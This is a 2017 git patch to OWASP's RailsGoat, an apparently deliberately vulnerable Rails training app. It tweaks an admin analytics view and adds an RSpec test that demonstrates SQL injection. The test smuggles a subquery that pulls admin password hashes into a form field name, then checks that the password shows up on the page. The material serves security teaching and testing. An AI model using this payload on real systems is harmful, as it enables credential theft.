From 9b1d402937fc767a7eae86af512356cff7a886e2 Mon Sep 17 00:00:00 2001
From: Joseph Mastey <jmmastey@gmail.com>
Date: Mon, 18 Sep 2017 18:44:45 -0500
Subject: [PATCH] feat(vulnerabilities): adds description of vulnerability for
 sql interpolation

also fixes several small errors on that page, otherwise JS raises errors.

fixes #181
---
 app/views/layouts/admin/_analytics.html.erb | 20 ++++++++++---------
 spec/vulnerabilities/sql_injection_spec.rb  | 22 ++++++++++++++++++++-
 2 files changed, 32 insertions(+), 10 deletions(-)

diff --git a/app/views/layouts/admin/_analytics.html.erb b/app/views/layouts/admin/_analytics.html.erb
index be676a0..ba0c436 100644
--- a/app/views/layouts/admin/_analytics.html.erb
+++ b/app/views/layouts/admin/_analytics.html.erb
@@ -1,18 +1,18 @@
-<form action="">
-  Search by IP: <input type="text" name="ip"><br />
-  <input type="checkbox" value="" name="field[ip_address]"> IP Address<br />
-  <input type="checkbox" value="" name="field[referrer]"> Referrer<br />
-  <input type="checkbox" value="" name="field[user_agent]"> User Agent
+<form action="" id="analytics_search">
+  Search by IP: <input type="text" id="ip" name="ip"><br />
+  <input type="checkbox" value="" id="field_ip_address" name="field[ip_address]"> IP Address<br />
+  <input type="checkbox" value="" id="field_referrer" name="field[referrer]"> Referrer<br />
+  <input type="checkbox" value="" id="field_user_agent" name="field[user_agent]"> User Agent
 </form>
 
 <div id="dt_example" class="example_alt_pagination">
-    <table class="table table-striped table-hover table-bordered pull-left" id="data-table">
+    <table class="table table-striped table-hover table-bordered pull-left <%= "custom" if params[:field] %>" id="data-table">
       <thead>
         <tr>
           <%
-          count = (params[:field] ? params[:field].count : 3)
+          count = (params[:field] ? (params[:field].count+1) : 6)
           count.times do %>
-          <td>&nbsp;</td>
+          <th>&nbsp;</th>
           <% end %>
         </tr>
       </thead>
@@ -33,6 +33,8 @@
   </div>
 </div>
 
+<%= javascript_include_tag "jquery.dataTables.js"%>
+
 <script type="text/javascript">
 
 function dataTablePagination(){
@@ -42,4 +44,4 @@ function dataTablePagination(){
 };
 
 $(document).ready(dataTablePagination());
-</script>
\ No newline at end of file
+</script>
diff --git a/spec/vulnerabilities/sql_injection_spec.rb b/spec/vulnerabilities/sql_injection_spec.rb
index a963a56..96ffe83 100644
--- a/spec/vulnerabilities/sql_injection_spec.rb
+++ b/spec/vulnerabilities/sql_injection_spec.rb
@@ -1,7 +1,7 @@
 require 'spec_helper'
 
 feature 'sql injection' do
-  before do
+  before(:each) do
     UserFixture.reset_all_users
     @normal_user = UserFixture.normal_user
     @admin_user = User.where("admin='t'").first
@@ -28,4 +28,24 @@ feature 'sql injection' do
     expect(@admin_user.email).to eq('joe.admin@schmoe.com')
     expect(@admin_user.admin).to eq(true)
   end
+
+  scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-SQL-Injection-Interpolation", js: true do
+    login(@normal_user)
+    Analytics.create!(ip_address: "::1")
+
+    visit "/admin/1/analytics"
+
+    within('#analytics_search') do
+      fill_in 'ip', :with => '::1'
+      check "field_user_agent"
+      payload = "(select group_concat(password) from users where admin='t')"
+
+      page.execute_script "$('#field_user_agent').attr('name', \"field[#{payload}]\");"
+      page.execute_script "$('#analytics_search').submit();"
+    end
+
+    pending if verifying_fixed?
+    expect(page).to have_css(".dataTable.custom")
+    expect(page.source).to include(@admin_user.password)
+  end
 end